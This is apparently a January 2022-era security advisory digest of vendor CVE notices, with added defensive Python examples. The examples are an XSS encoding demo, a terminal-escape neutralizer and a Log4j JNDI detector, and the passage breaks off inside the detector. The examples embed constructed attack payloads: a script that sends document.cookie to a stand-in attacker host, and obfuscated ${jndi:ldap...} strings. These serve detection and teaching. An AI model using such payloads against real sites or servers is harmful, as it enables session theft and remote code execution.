CVE ID: CVE-2021-20877 (Medium)
Drupal has released a security update to address a Cross Site Scripting (XSS) vulnerability
in jQuery UI 1.13.0.
CVE ID: CVE-2021-41182 (Medium), CVE-2021-41183 (Medium), CVE-2016-7103,
CVE-2010-5312
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in several Huawei products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2021-40042 (Medium), CVE-2021-40033 (Medium)
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20649 (Critical), CVE-2022-20648 (Medium), CVE-2022-20685 (High),
CVE-2022-20655 (High), CVE-2022-20654 (High)
Google has released security update for Chrome Beta 98 (98.0.4758.63) for Android and iOS,
extended stable channel 96.0.4664.174 for Windows and Mac and stable channel 97.0.4692.99
for Windows, Mac and Linux.
CVE ID: CVE-2022-0289 (Critical), CVE-2022-0290 to CVE-2022-0298 (High),
CVE-2022-0300 to CVE-2022-0306 (High), CVE-2022-0307 to CVE-2022-0311 (Medium)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-42392 (Critical), CVE-2021-43818 (High), CVE-2021-44832 (Medium),
CVE-2021-4044 (Medium), CVE-2021-42550 (Medium), CVE-2021-45105 (Medium)
F5 Networks has released security updates to address multiple vulnerabilities in the MySQL
Server component of Oracle MySQL. An attacker can exploit these vulnerabilities to take
control of an affected device.
CVE ID: CVE-2017-3308 (High), CVE-2017-3456 (Medium), CVE-2017-3464 (Medium),
CVE-2020-2780 (Medium)
An improper input validation vulnerability has been discovered in Serv-U. The affected
versions are Serv-U 15.2.5 and previous versions. The updates are available.
CVE ID: CVE-2021-35247 (Medium)
Overwrite and persistent password reset poisoning vulnerabilities have been discovered in
the Umbraco CMS configuration element "UmbracoApplicationUrl". The updates are available.
CVE ID: CVE-2022-22691 (Medium), CVE-2022-22690 (High)
Oracle has released its critical patch update for January 2022 to address 497
vulnerabilities across multiple products. A remote attacker can exploit these
vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-21391 (Critical), CVE-2022-21390 (Critical), CVE-2022-21389
(Critical), CVE-2022-21306 (Critical), CVE-2022-21276 (Critical), CVE-2022-21275 (Critical),
CVE-2021-35683 (Critical), CVE-2021-35587 (Critical)
A Denial of Service (DoS) vulnerability has been discovered in VMware Workstation and
Horizon Client for Windows. Successful exploitation may trigger a DoS condition in the
Thinprint service running on the host machine where VMware Workstation or Horizon Client for
Windows is installed. The updates are available.
CVE ID: CVE-2022-22938 (Medium)
Stored Cross-Site Scripting (XSS) vulnerabilities have been discovered in various WordPress
plugins. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-0233 (Medium), CVE-2022-0232 (Medium)
Multiple vulnerabilities such as command injection and privilege escalation have been
discovered in McAfee Agent (MA) for Windows. It is recommended to install or update to
McAfee Agent 5.7.5 release.
CVE ID: CVE-2021-31854 (High), CVE-2022-0166 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
An Authentication Bypass vulnerability has been discovered in ManageEngine Desktop Central
and Desktop Central MSP. This vulnerability can allow an attacker to read unauthorized data
or write an arbitrary zip file on the server.
CVE ID: CVE-2021-44757 (Critical)
Ivanti has updated its Log4j advisory with security updates for multiple products to address
the vulnerability. An unauthenticated attacker can exploit this vulnerability to take
control of an affected system.
CVE ID: CVE-2021-44228 (Critical)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-45046 (Critical), CVE-2021-44228 (Critical), CVE-2021-45105
(Medium), CVE-2021-22096 (Medium)
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-23094, CVE-2022-0217
It has been discovered that NUUO NVRmini2 (Network Video Recorder) through 3.11 allows an
unauthenticated attacker to upload an encrypted TAR archive, which can be abused to add
arbitrary users because of the lack of handle_import_user.php authentication. When combined
with another flaw (CVE-2011-5325), it is possible to overwrite arbitrary files under the web
root and achieve code execution as root.
CVE ID: CVE-2022-23227
Dell has released security updates to address AMD Graphics Driver vulnerabilities on Windows
10 that may be exploited by malicious users to compromise affected systems.
Multiple vulnerabilities, such as unauthenticated sensitive data disclosure and stored
Cross-Site Scripting, have been discovered in various WordPress plugins. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-0236 (High), CVE-2021-4074 (Medium), CVE-2022-0210 (Medium)
F5 Networks has released security updates to address multiple vulnerabilities in several
products. An attacker can exploit these vulnerabilities to take control of an affected
device.
CVE ID: CVE-2021-3506, CVE-2021-28660, CVE-2021-28952, CVE-2017-3309, CVE-2017-3453,
CVE-2019-2974
It has been discovered that in doRead of SimpleDecodingSource.cpp, there is a possible out
of bounds write vulnerability due to an incorrect bounds check. This can lead to remote
escalation of privilege with no additional execution privileges needed.
CVE ID: CVE-2021-39623 (Critical)
Juniper Networks has released security updates to resolve multiple vulnerabilities in
Juniper Networks products. An attacker can exploit these vulnerabilities to take control of
an affected system.
CVE ID: CVE-2021-44228 (Critical), CVE-2021-45046 (Critical), CVE-2021-31385 (High),
CVE-2021-4104 (High), CVE-2021-42550 (Medium)
Multiple vulnerabilities have been discovered in NetApp Products. An attacker can exploit
these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-44548 (Critical), CVE-2021-38931 (Medium), CVE-2021-29678 (High),
CVE-2021-38926 (Medium), CVE-2021-39002 (High), CVE-2021-44733 (High), CVE-2021-45469
(High), CVE-2021-4008 (High), CVE-2021-4009 (High), CVE-2021-4010 (High), CVE-2021-4011
(High)
Microsoft has released security updates to resolve an elevation of privilege vulnerability
in Win32k affecting multiple Windows products.
CVE ID: CVE-2022-21882 (High)
It has been discovered that Mattermost Focalboard contains an Insufficient Session
Expiration vulnerability. When a user initiates a logout, their session is not invalidated
properly. In addition, user sessions are stored in the browser's local storage, which by
default does not have an expiration time. This makes it possible for an attacker to steal
and reuse the cookies using techniques such as XSS attacks, to completely take over a victim
account.
CVE ID: CVE-2022-22122 (Critical)
Multiple vulnerabilities have been discovered in Hitachi Energy's e-mesh Energy Management
System. An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2020-8174 (High), CVE-2020-8265 (High), CVE-2020-11080 (High),
CVE-2021-22883 (High)
A release of illegal memory vulnerability has been discovered in the snmpd daemon of Juniper
Networks Junos OS and Junos OS Evolved that allows an attacker to halt the snmpd daemon,
causing a sustained Denial of Service (DoS) to the service until it is manually restarted.
CVE ID: CVE-2022-22177 (Medium)
Multiple vulnerabilities have been discovered in the Link Layer Discovery Protocol (LLDP)
implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated
adjacent attacker can execute code or can cause LLDP database corruption on the affected
device.
CVE ID: CVE-2021-34779 (High), CVE-2021-34780 (High), CVE-2021-34775 (Medium),
CVE-2021-34776 (Medium), CVE-2021-34777 (Medium), CVE-2021-34778 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
It has been discovered that the Password Manager MIRUPASS PW10/PW20 contains a missing
encryption vulnerability. An attacker can exploit this vulnerability to take control of an
affected system.
CVE ID: CVE-2022-0183 (Medium)
It has been discovered that the Label printers TEPRA PRO SR5900P/SR-R7900P contain an
insufficiently protected credentials vulnerability. An attacker can exploit this
vulnerability to take control of an affected system.
CVE ID: CVE-2022-0184 (Medium)
Multiple vulnerabilities have been discovered in Citrix Hypervisor, which can allow
privileged code in a guest VM to cause the host to crash or become unresponsive. An attacker
can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-28704, CVE-2021-28705, CVE-2021-28714, CVE-2021-28715
It has been discovered that systemd-tmpfiles employed uncontrolled recursion when removing
deeply nested directory hierarchies. A local attacker can exploit this to cause
systemd-tmpfiles to crash or have other unspecified impacts.
CVE ID: CVE-2021-3997
Multiple vulnerabilities, such as NULL pointer dereference, integer underflow, out-of-bounds
read, and memory leak, have been discovered in Moxa's VPort 06EC-2V Series IP Cameras and
VPort 461A Series Video Servers. An attacker can exploit some of these vulnerabilities to
take control of an affected system.
Apple has released a security update to address a Denial of Service vulnerability in iOS
15.2.1 and iPadOS 15.2.1. An attacker can exploit this vulnerability to take control of an
affected device.
CVE ID: CVE-2022-22588
Multiple vulnerabilities have been discovered in Mitsubishi Electric's MELSEC-F Series, and
MELSEC iQ-R, Q and L Series. An attacker can exploit these vulnerabilities to take control
of an affected system.
CVE ID: CVE-2021-20613 (High), CVE-2021-20612 (High), CVE-2020-5652 (High)
F5 Networks has released security updates to address multiple vulnerabilities in its
products. An attacker can exploit these vulnerabilities to take control of an affected
device.
CVE ID: CVE-2018-3620 (Medium), CVE-2020-14550 (Medium), CVE-2020-2574 (Medium),
CVE-2020-2752 (Medium), CVE-2020-2922 (Low), CVE-2021-2007 (Low), CVE-2021-2011 (Medium)
QNAP NAS has released security updates to address multiple vulnerabilities in several
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2021-38682, CVE-2021-38689, CVE-2021-38690, CVE-2021-38691,
CVE-2021-38692, CVE-2021-38677, CVE-2021-38678
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2021-43818, CVE-2021-45085, CVE-2021-45086, CVE-2021-45087,
CVE-2021-45088
It has been discovered that Jimoty App for Android uses a hard-coded API key for an external
service. Jimoty for Android versions prior to 3.7.42 are affected.
CVE ID: CVE-2022-0131 (Medium)
Multiple vulnerabilities, such as cross-site request forgery, reflected cross-site scripting,
and stored cross-site scripting, have been discovered in the WordPress plugin "Quiz And
Survey Master". The affected versions are Quiz And Survey Master versions prior to 7.3.7.
CVE ID: CVE-2022-0180 (Medium), CVE-2022-0181 (Medium), CVE-2022-0182 (Medium)
Juniper Networks has released security updates to resolve multiple vulnerabilities in
Juniper Networks Junos OS. An attacker can exploit these vulnerabilities to take control of
an affected system.
SUSE has released security updates to resolve several vulnerabilities in multiple products.
CVE ID: CVE-2021-44224, CVE-2021-44790, CVE-2021-3572, CVE-2021-45942, CVE-2021-4126,
CVE-2021-44538
It has been discovered that the HTML Cleaner in lxml, a Python binding for the libxml2 and
libxslt libraries, does not properly sanitize its input, which can lead to cross-site
scripting. It is recommended to upgrade the lxml packages.
CVE ID: CVE-2021-43818
Multiple vulnerabilities have been discovered in various Palo Alto Networks products. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-0015 (High), CVE-2022-0014 (Medium), CVE-2022-0013 (Medium),
CVE-2022-0012 (Medium)
Google has released Chrome Beta 98 (98.0.4758.54) for Android, Chrome Beta 98 (98.0.4758.51)
for iOS, and Chrome 98.0.4758.55 for Mac and 98.0.4758.54 for Windows and Linux. These
versions address vulnerabilities that an attacker can exploit to take control of an
affected system.
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20658 (Critical), CVE-2022-20652 (Medium), CVE-2022-20663 (Medium),
CVE-2022-20626 (Medium), CVE-2022-20656 (Medium), CVE-2022-20657 (Medium), CVE-2022-20660
(Medium), CVE-2022-20631 (Medium), CVE-2022-20632 (Medium), CVE-2022-20635 (Medium),
CVE-2022-20636 (Medium), CVE-2022-20651 (Medium)
A Remote Code Execution (RCE) vulnerability has been discovered in the KCodes NetUSB kernel
module, integrated into millions of end-user routers from vendors such as Netgear, TP-Link,
Tenda, EDiMAX, D-Link, and Western Digital.
CVE ID: CVE-2021-45608
Multiple vulnerabilities have been resolved in GitLab updated versions 14.6.2, 14.5.3, and
14.4.5 for GitLab Community Edition (CE) and Enterprise Edition (EE).
Node.js has released security updates to resolve multiple vulnerabilities in its products.
An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-44531 (Medium), CVE-2021-44532 (Medium), CVE-2021-44533 (Medium),
CVE-2022-21824 (Low)
An Elevation of Privilege vulnerability has been discovered in Microsoft Windows Active
Directory Domain Services. Successful exploitation of this vulnerability may allow a remote
attacker to gain elevated privileges on the targeted system.
CVE ID: CVE-2022-21857
Multiple vulnerabilities such as Use of Hard-coded Credentials, and Buffer Copy without
Checking Size of Input have been discovered in Schneider Electric's Equipment- Easergy P5.
An attacker can exploit these vulnerabilities to cause disclosure of the device credentials,
denial of service, or device reboot, or to gain full control of the relay.
CVE ID: CVE-2022-22722 (High), CVE-2022-22723 (High)
Multiple vulnerabilities have been discovered in several products of Siemens. A remote
attacker may exploit some of these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-45033 (Critical), CVE-2021-45034 (Medium), CVE-2021-45460 (Low),
CVE-2021-41769 (Medium), CVE-2021-31346 (High), CVE-2021-31885 (High), CVE-2021-31889
(High), CVE-2021-31890 (High), CVE-2021-31345 (High), CVE-2021-31344 (Medium)
Microsoft has released updates to address multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-21969 (Critical), CVE-2022-21907 (Critical), CVE-2022-21901
(Critical), CVE-2022-21855 (Critical), CVE-2022-21849 (Critical)
Citrix has released a security update to address a local privilege escalation vulnerability
in Workspace App for Linux. An attacker can exploit this vulnerability to take control of an
affected system.
CVE ID: CVE-2022-21825
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
An improper handling of syntactically invalid structure vulnerability has been discovered in
Johnson Controls' Equipment- VideoEdge. Running a vulnerability scanner against VideoEdge
NVRs can cause some functions to stop.
CVE ID: CVE-2021-36199 (Medium)
Multiple vulnerabilities have been discovered in WordPress, a web blogging tool. These
vulnerabilities allow remote attackers to perform SQL injection, run unchecked SQL queries,
bypass hardening, or perform Cross-Site Scripting (XSS) attacks. It is recommended to
upgrade the wordpress packages.
CVE ID: CVE-2022-21661, CVE-2022-21662, CVE-2022-21663, CVE-2022-21664
Ubuntu has released security updates to address multiple vulnerabilities in Linux kernel. An
attacker can exploit these vulnerabilities to take control of an affected device.
Multiple vulnerabilities have been discovered in Schneider Electric's Modicon M340
controller and Communication Modules. It is recommended to apply the mitigations immediately
to reduce the risk of exploit.
CVE ID: CVE-2022-22724 (High), CVE-2020-7534 (Medium)
It has been discovered that all versions of Samba prior to 4.13.16 are vulnerable to a
malicious client using an SMB1 or NFS symlink race to allow a directory to be created in an
area of the server file system not exported under the share definition.
CVE ID: CVE-2021-43566
Red Hat has released security updates to address multiple vulnerabilities in Red Hat
OpenShift Container Platform. An attacker can exploit these vulnerabilities to take control
of an affected system.
Cisco has released security updates to address Apache Log4j vulnerabilities in multiple
Cisco products.
CVE ID: CVE-2021-44228 (Critical), CVE-2021-45046 (Critical)
Huawei has released security updates to address multiple vulnerabilities in OpenSSL
affecting several Huawei products. An attacker can exploit these vulnerabilities to take
control of an affected device.
CVE ID: CVE-2016-2108, CVE-2016-2107, CVE-2016-2106, CVE-2016-2105, CVE-2016-2109,
CVE-2016-2176, CVE-2016-0800
Google has released Beta channel update 98.0.4758.46 (Platform version: 14388.24.0) for most
Chrome OS devices, and Chrome Beta channel update 98.0.4758.48 for Windows, Mac and Linux.
It has been discovered that Samba vulnerabilities affect multiple NetApp products. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-43566 (Low), CVE-2021-20316 (Medium)
It has been discovered that ClamAV version 0.102, an anti-virus toolkit, has reached its
end-of-life. ClamAV has been updated to version 0.103 to be able to receive virus signature
updates. It is recommended to upgrade the clamav packages.
Multiple vulnerabilities have been discovered in vim, an enhanced vi text editor. It is
recommended to upgrade the vim packages.
CVE ID: CVE-2017-17087, CVE-2019-20807, CVE-2021-3778, CVE-2021-3796
It has been discovered that Teedy, versions v1.5 through v1.9 are vulnerable to Stored
Cross-Site Scripting (XSS) in the name of a created Tag. Since the Tag name is not being
sanitized properly in the edit tag page, a low privileged attacker can store malicious
scripts in the name of the Tag.
CVE ID: CVE-2022-22115 (Critical)
It has been discovered that Teedy, versions v1.5 through v1.9 are vulnerable to Reflected
Cross-Site Scripting (XSS). The "search term" search functionality is not sufficiently
sanitized while displaying the results of the search, which can be leveraged to inject
arbitrary scripts.
CVE ID: CVE-2022-22114 (Critical)
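Both Teedy entries above (stored XSS in a tag name, reflected XSS in an echoed search term) come down to untrusted data being written into HTML without encoding for the context it lands in. The following Python is an added illustration for this digest, not Teedy's code: it renders a small results page once with raw interpolation and once with context-appropriate encoding, then parses both with the standard-library HTML parser to show which tags and event handlers a browser would actually see. The tag name, search term and page layout are constructed for the example.

```python
from html import escape
from html.parser import HTMLParser

# Constructed attacker-controlled inputs, standing in for a stored tag name and
# a search term reflected into the results page.
CONSTRUCTED_TAG_NAME = '<img src=x onerror="alert(document.cookie)">'
CONSTRUCTED_SEARCH_TERM = (
    '"><script>fetch("https://attacker.invalid/?c="+document.cookie)</script>'
)


def render_results_vulnerable(term, tags):
    """Interpolates raw user data into an attribute value and into text nodes."""
    items = "".join(f'<li class="tag">{t}</li>' for t in tags)
    return (
        f'<input name="search" value="{term}">'
        f"<p>Results for {term}</p>"
        f"<ul>{items}</ul>"
    )


def render_results_safe(term, tags):
    """Same page, with every untrusted value encoded for where it is placed.

    escape(quote=True) turns < > & " ' into entities, which is the right
    encoding for HTML text nodes and for quoted attribute values. It is NOT
    enough inside <script>, inside on* handlers or in URLs; those contexts
    need their own encoding or, better, should never receive user data.
    """
    safe_term = escape(term, quote=True)
    items = "".join(f'<li class="tag">{escape(t, quote=True)}</li>' for t in tags)
    return (
        f'<input name="search" value="{safe_term}">'
        f"<p>Results for {safe_term}</p>"
        f"<ul>{items}</ul>"
    )


class _TagCollector(HTMLParser):
    """Records the start tags and on* attributes a browser-like parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def parse_tags(html):
    """Return (start_tags, event_handler_attributes) found in the markup."""
    collector = _TagCollector()
    collector.feed(html)
    collector.close()
    return collector.tags, collector.handlers


if __name__ == "__main__":
    for render in (render_results_vulnerable, render_results_safe):
        page = render(CONSTRUCTED_SEARCH_TERM, [CONSTRUCTED_TAG_NAME])
        print(render.__name__, parse_tags(page))
```

The parser-based check matters more than it looks: string searches for `<script` or `onerror=` still "find" those substrings in the safe output, where they are inert entity-encoded text, so a test that inspects what an HTML parser produces is the one that reflects what a browser would execute.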
It has been discovered that various Silicon Labs Z-Wave chipsets do not support encryption,
can be downgraded to weaker or no encryption, and are vulnerable to denial of service.
Depending on the chipset and device, an attacker within Z-Wave radio range can deny service,
crash devices, deplete batteries, intercept, observe and replay traffic, and control
vulnerable devices.
CVE ID: CVE-2020-9057, CVE-2020-9058, CVE-2020-9059, CVE-2020-9060, CVE-2020-9061,
CVE-2020-10137
Debian has released security update to address multiple vulnerabilities in Ghostscript, the
GPL PostScript/PDF interpreter.
CVE ID: CVE-2021-45944 (Medium), CVE-2021-45949 (Medium)
Debian has released a security update to address a vulnerability in roundcube, a skinnable
AJAX-based webmail solution for IMAP servers, which may allow an attacker to perform
Cross-Site Scripting (XSS) attacks.
CVE ID: CVE-2021-46144
Red Hat has released security update for rh-nodejs14-nodejs and rh-nodejs14-nodejs-nodemon
to resolve multiple vulnerabilities.
CVE ID: CVE-2021-3807 (High), CVE-2021-3918 (Critical), CVE-2021-22959 (Medium),
CVE-2021-22960 (Medium), CVE-2021-37701 (High), CVE-2021-37712 (High)
QNAP has released a security update to resolve a vulnerability in NAS devices running QVPN
Service which allows an attacker to run arbitrary code on the system. The affected products
are QVPN Service 3.0.760 and later.
A reflected Cross-Site Scripting (XSS) vulnerability has been resolved in the QTS, QuTS hero
and QuTScloud TFTP server, which allowed a remote attacker to inject malicious code.
CVE ID: CVE-2021-38674 (Medium)
A stack-based buffer overflow vulnerability has been discovered in the SonicOS SessionID
HTTP response header. This vulnerability affects SonicOS Gen 6 and Gen 7 firmware versions.
CVE ID: CVE-2021-20048 (Medium)
A vulnerability has been discovered in the H2 database console. This vulnerability has the
same root cause as the infamous Log4Shell vulnerability in Apache Log4j (JNDI remote class
loading).
CVE ID: CVE-2021-42392 (Critical)
It has been discovered that kubectl does not neutralize escape, meta or control sequences
contained in the raw data it outputs to a terminal. This includes but is not limited to the
unstructured string fields in objects such as Events.
CVE ID: CVE-2021-25743 (Low)
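The kubectl issue above is a general one for any tool that prints attacker-influenced strings to a terminal: CSI sequences can clear the screen or reposition the cursor, OSC sequences can retitle the window, and bare carriage returns can overwrite what the operator already read. The Python below is an added illustration and is not kubectl's code. It lists the sequence families that matter and provides a neutralize function that rewrites them as visible `\xNN` literals, so the data is shown rather than interpreted. The Event message is a constructed sample.

```python
import re

# Constructed sample, not real cluster data: an Event message carrying the kind
# of terminal control sequences an attacker could place in an object field.
# Written raw to a tty these would clear the screen, move the cursor, retitle
# the window and print a fake red "FAILED" line.
CONSTRUCTED_EVENT_MESSAGE = (
    "Back-off restarting container"
    "\x1b[2J\x1b[H"          # CSI: clear screen, cursor home
    "\x1b]0;pwned\x07"       # OSC: set terminal title
    "\x1b[31mFAILED\x1b[0m"  # SGR: red text
    "\r\n"                   # CR lets the next write overwrite this line
)

# Sequences that must not reach a terminal unescaped:
#   CSI  ESC [ params intermediates final        e.g. \x1b[2J, \x1b[31m
#   OSC  ESC ] ... terminated by BEL or ESC \    e.g. \x1b]0;title\x07
#   Fe   ESC + one byte in 0x40-0x5f             e.g. \x1bc (full reset)
#   bare C0 control bytes except \t and \n, plus DEL
_TERMINAL_CONTROL_RE = re.compile(
    r"\x1b\[[0-?]*[ -/]*[@-~]"
    r"|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"
    r"|\x1b[@-_]"
    r"|[\x00-\x08\x0b-\x1f\x7f]"
)


def _visible(match):
    """Rewrite every control byte in the matched sequence as a printable \\xNN."""
    return "".join(
        f"\\x{ord(ch):02x}" if ord(ch) < 0x20 or ord(ch) == 0x7F else ch
        for ch in match.group(0)
    )


def neutralize(text):
    """Return text that is safe to write to a tty: sequences are shown, not run."""
    return _TERMINAL_CONTROL_RE.sub(_visible, text)


def is_safe_for_tty(text):
    """True when the text contains nothing a terminal would interpret."""
    return _TERMINAL_CONTROL_RE.search(text) is None


if __name__ == "__main__":
    print(neutralize(CONSTRUCTED_EVENT_MESSAGE))
```

Tabs and newlines are deliberately left alone because they carry legitimate layout; everything else in the C0 range is made visible. A tool that wants colour in its own output should add it after neutralizing the data, never before.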
Multiple vulnerabilities have been discovered in IDEC's Equipment- PLCs (Programmable Logic
Controllers). Successful exploitation of these vulnerabilities can allow an attacker to
upload, alter, and/or download the PLC user program.
CVE ID: CVE-2021-37400 (High), CVE-2021-37401 (High), CVE-2021-20826 (High),
CVE-2021-20827 (High)
An uncontrolled resource consumption vulnerability has been discovered in Fernhill
Software's Equipment- Fernhill SCADA Server. Successful exploitation of this vulnerability
can cause a Denial-of-Service (DoS) condition. The affected products are Fernhill SCADA
Server Version 3.77 and earlier on all supported platforms (Windows, Linux, macOS).
CVE ID: CVE-2022-21155 (High)
A stack-based buffer overflow vulnerability has been discovered in Omron's Equipment-
CX-One. Successful exploitation of this vulnerability can allow arbitrary code execution.
The affected products are CX-One: Versions 4.60 and prior.
CVE ID: CVE-2022-21137 (High)
An improper access control vulnerability has been discovered in Philips' Equipment- Engage
Software. Successful exploitation of this vulnerability can allow improper viewing of
business contact information. The affected products are Engage Software Versions 6.2.1 and
prior.
CVE ID: CVE-2021-23173 (Low)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Debian has released a security update to address a vulnerability in Sphinxsearch, a fast
standalone full-text SQL search engine, which can allow arbitrary files to be read by
abusing a configuration option.
CVE ID: CVE-2020-29050
A SQL injection vulnerability has been discovered in the web-based management interface of
Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM). It is
recommended to update the software.
CVE ID: CVE-2020-3339 (Medium)
A vulnerability has been discovered in the web-based management interface of Cisco Common
Services Platform Collector (CSPC) which can allow an authenticated, remote attacker to
access sensitive data on an affected system. It is recommended to update the software.
CVE ID: CVE-2021-34774 (Medium)
Microsoft has released the latest Microsoft Edge Stable Channel (Version 97.0.1072.55) which
incorporates the latest security updates of the Chromium project to resolve multiple
vulnerabilities.
Google has released update for Chrome Beta 98 (98.0.4758.34) for both Android & iOS and
stable channel 97.0.4692.77 (Platform version: 14324.62.0) for most Chrome OS devices.
It has been discovered that forge (node-forge), a JavaScript implementation of TLS and
related cryptographic tools, is vulnerable to URL Redirection to Untrusted Site. An attacker
can exploit this vulnerability to redirect users to a site under their control.
Multiple vulnerabilities have been discovered in Moxa's EDR-G903, EDR-G902 and EDR-810
Series Secure Routers. Moxa has developed appropriate solutions to address these
vulnerabilities.
Multiple DNSpooq vulnerabilities have been discovered in dnsmasq which affects Moxa's
AWK-3131A/4131A/1137C/1131A series products. Moxa has developed appropriate solutions to
address these vulnerabilities.
CVE ID: CVE-2020-25681, CVE-2020-25682, CVE-2020-25683, CVE-2020-25684,
CVE-2020-25685, CVE-2020-25686, CVE-2020-25687
Dell has released security updates to address multiple vulnerabilities in several products
which can be exploited by malicious users to compromise the affected system.
It has been discovered that WordPress Plugin "Advanced Custom Fields" contains multiple
missing authorisation vulnerabilities. An attacker can exploit these vulnerabilities to take
control of an affected system.
CVE ID: CVE-2021-20865 (Medium), CVE-2021-20866 (Medium), CVE-2021-20867 (Medium)
It has been discovered that in libexpat (Expat), a crafted XML file can cause an integer
overflow on m_groupSize in the doProlog function.
CVE ID: CVE-2021-46143
A vulnerability has been discovered in AtaLegacySmm in the kernel 5.0 before 05.08.46, 5.1
before 05.16.46, 5.2 before 05.26.46, 5.3 before 05.35.46, 5.4 before 05.43.46, and 5.5
before 05.51.45 in Insyde InsydeH2O. Code execution vulnerability can occur because the SMI
handler lacks a CommBuffer check.
CVE ID: CVE-2021-41842
A null pointer dereference vulnerability has been discovered in GPAC 1.0.1 in MP4Box via
__strlen_avx2, which causes a Denial of Service (DoS).
CVE ID: CVE-2021-45831
Multiple vulnerabilities have been discovered in Daybyday CRM. An attacker can exploit
these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-22111 (High), CVE-2022-22110 (High), CVE-2022-22109 (Medium),
CVE-2022-22108 (Medium), CVE-2022-22107 (Medium)
Red Hat has released Red Hat OpenShift Container Platform 4.8.25 to resolve multiple
vulnerabilities and add enhancements.
CVE ID: CVE-2021-39240 (High), CVE-2021-39241 (Medium), CVE-2021-39242 (High),
CVE-2021-39246 (Medium)
Red Hat has released security update for Red Hat Single Sign-On 7.5 container images for IBM
P/Z which fixes incorrect authorization allowing unprivileged users to create other users.
CVE ID: CVE-2021-3712 (High), CVE-2021-4133, CVE-2021-42574 (High)
Ubuntu has released security updates to address several vulnerabilities in Linux kernel. An
attacker can exploit these vulnerabilities to take control of an affected system.
Siemens has released a list of products affected from Apache Log4j vulnerabilities. The
workarounds & mitigations are also available.
CVE ID: CVE-2021-44228 (Critical), CVE-2021-45046 (Critical)
Intel has released security update to patch Apache Log4j vulnerabilities in multiple Intel
Products.
CVE ID: CVE-2021-44228 (Critical), CVE-2021-45046 (Critical)
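The Cisco, Siemens and Intel Log4j entries above, and the H2 console entry with the same JNDI root cause, all turn on the same attacker input: a `${jndi:...}` lookup that Log4j evaluates. Exploitation attempts rarely arrive in that plain form; they hide the keyword behind nested lookups such as `${lower:j}` or `${::-j}` that Log4j resolves before the JNDI lookup runs. The Python below is an added detection example, not code from any of the vendors named: it collapses the nested lookups the same way from the inside out, then searches for the JNDI keyword. The access-log lines are constructed, with documentation IP addresses.

```python
import re

# Constructed web-server access log lines (not from any real system). Lines 2-4
# carry a JNDI lookup in the User-Agent or query string: plain, case-obfuscated
# with ${lower:}, and default-value-obfuscated with ${::-}.
CONSTRUCTED_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:13:37:00 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:37:01 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:37:02 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7/a} HTTP/1.1" 404 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:13:37:03 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
    '10.0.0.3 - - [10/Dec/2021:13:37:04 +0000] "GET /docs/${version} HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

# Innermost lookups that evaluate to a literal:
#   ${lower:X} / ${upper:X}  -> X   (case is irrelevant, everything is lowercased later)
#   ${anything:-X}           -> X   (a lookup that fails falls back to its default)
# Applying this repeatedly from the inside out collapses the usual obfuscations
# back to the plain ${jndi:...} form.
_COLLAPSIBLE = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"
    r"|\$\{[^${}]*:-([^${}]*)\}",
    re.IGNORECASE,
)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(s):
    """Collapse nested lookups until the string stops changing, then lowercase."""
    prev = None
    while prev != s:
        prev = s
        s = _COLLAPSIBLE.sub(
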